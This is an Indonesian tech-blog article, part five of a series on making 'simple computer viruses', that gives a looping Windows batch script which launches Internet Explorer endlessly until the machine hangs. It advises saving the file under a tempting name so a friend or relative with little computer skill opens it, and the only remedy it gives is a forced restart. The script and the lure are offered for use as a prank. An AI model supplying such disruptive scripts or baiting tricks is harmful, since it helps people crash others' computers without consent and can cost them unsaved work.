• NONTONYUK!
  • Pasang Iklan
  • Hubungi Kami
  • Tentang Kami
  • Kerjasama
No Name
 

Cara Membuat Virus Komputer Sederhana Berikut Solusinya (Part 5 - Selesai) | AWAS KACAU!

Cara Membuat Virus Komputer Sederhana Berikut Solusinya (Part 5 - Selesai) | AWAS KACAU!

00
Selasa, 15 Sep 2015, 11:02 WIB
Penasaran nggak virus apa lagi sih yang bisa dijadikan bahan buat ngusilin temen kamu? Nah kali ini JalanTikus sajikan masih berupa virus komputer sederhana tapi cukup kok buat bikin panik temen kamu atau sodara kamu yang gaptek.

Kami sudah menyajikan empat part cara membuat virus komputer sederhana berikut solusinya. Kami sadar sih virus sederhana kayak gini bukan tandingan kalian-kalian yang expert banget dalam ranah IT. Tapi virus yang kali ini kami sajikan bisa bener-bener bikin temen atau keluarga kamu yang gaptek jadi panik loh.

Virus ini nantinya bakal ngebuka program aplikasi berkali-kali sampe komputer atau laptop kamu ngehang. Duh!! Itung-itung belajar jadi Hacker kaya 10 Hacker paling berbahaya di dunia ini kan. Nah, ini dia cara membuat virus komputer sederhana berikut solusinya (part 5).

BACA JUGA
  • Cara Membuat Virus Komputer Sederhana Berikut Solusinya (Part 1)
  • Cara Membuat Virus Komputer Sederhana Berikut Solusinya (Part 2)
  • Cara Membuat Virus Komputer Sederhana Berikut Solusinya (Part 3)
  • Cara Membuat Virus Komputer Sederhana Berikut Solusinya (Part 4)

Virus ini kamu bisa buat bahkan di komputer yang sudah terinstal antivirus. Tapi awas ya, virus ini jangan dibuat untuk perbuatan jahat. Yaaah..kalo sekedar ngusilin temen sih nggak papa wkwkwk.... Cekidot, guys!

Cara Membuat Virus Komputer Sederhana Berikut Solusinya (Part 5)

  • Buka aplikasi Notepad pada PC atau laptop kamu.

    Buka Notepad
  • Copy dan paste script di bawah ini ke Notepad kamu:


@echo off
CLS
:A
start iexplore.exe
GOTO A

Note: Kamu bisa mengganti program Internet Explorer di atas dengan berbagai macam program yang mau dibuka berulang-ulang misalnya Mozilla Firefox ataupun Google Chrome.


  • Simpan (Save As) dengan nama apapun yang kamu suka dan hal yang membuat orang tertarik membukanya misalnya jangandibuka Jangan lupa tambahkan .bat di belakangnya ya. Pada Save as type pilih All Files.

    Save As Virus
  • Virus sudah tersimpan deh. Kamu bisa ganti namanya juga jadi lebih gimana gitu. Misalnya tambahkan tanda seru atau lainnya.

    Rename
  • Ini jadinya saat virus tersebut dibuka. Tim JalanTikus nggak bisa ambil screenshot karena program Internet Explorer-nya kebuka terus. Bikin komputer hang dan super lemoooottt!! Sempet panik juga sih. Hehehe...

    Virus

Jalan satu-satunya untuk ngeberhentiin virus ini adalah mematikan atau restart PC/laptop milikmu. Dan restart-nya pun langsung dari tombol shutdown karena kamu nggak bisa buka Start Menu. Intinya yang ada di layar nggak bisa diapa-apain lagi deh tuh. Super panik kalau orang yang diusilin itu gaptek. Perlu diingat juga, ketika kamu menyalakan laptop/PC lagi, pilih Start Windows Normally supaya error-nya hilang ya. HAHAHAH, Selamat mencoba!!

Windows Error

Credit: Virus komputer sederhana ini dibuat oleh Hafidz (tim JalanTikus) dan telah diuji coba pada komputer tim JalanTikus.

ARTIKEL TERKAIT
Game Fps Terbaik

6 Game FPS Android Terbaik di Bulan September 2015

Bukti Tuhan Itu Ada

Inikah Bukti Ilmiah Bahwa Tuhan itu Ada? (Part 2 - Selesai)

Teknologi

11 Orang Paling Berpengaruh di Dunia Teknologi (Ada Orang Indonesia-nya, Loh!!)

Bajaiapp Banner

GO-JEK Udah Mainstream, Sekarang Bisa Pesan Bajai pakai BajaiApp

Cara Menemukan Smartphone H

5 Cara Terbaik Untuk Menemukan Smartphone Yang Hilang

Tags Terkait:

APPS TERKAIT
Mobile Security Antivirus Icon
avast! Mobile Security and Antivirus
Apps Avast Software
Avg Antivirus For Android Icon
AVG Antivirus Security - FREE for Android
Apps AVG Technologies
Cm Security Applock Antivirus Icon Icon
CM Security AppLock Antivirus 3.1.9
Apps Cheetah Mobile
Avira Icon
Avira Antivirus Security
Apps Avira GmbH
Tunggu sebentar...

Keluar dari JalanTikus

Popup External Background JalanTikus

Apakah anda yakin untuk meninggalkan website JalanTikus?

Ya
Batal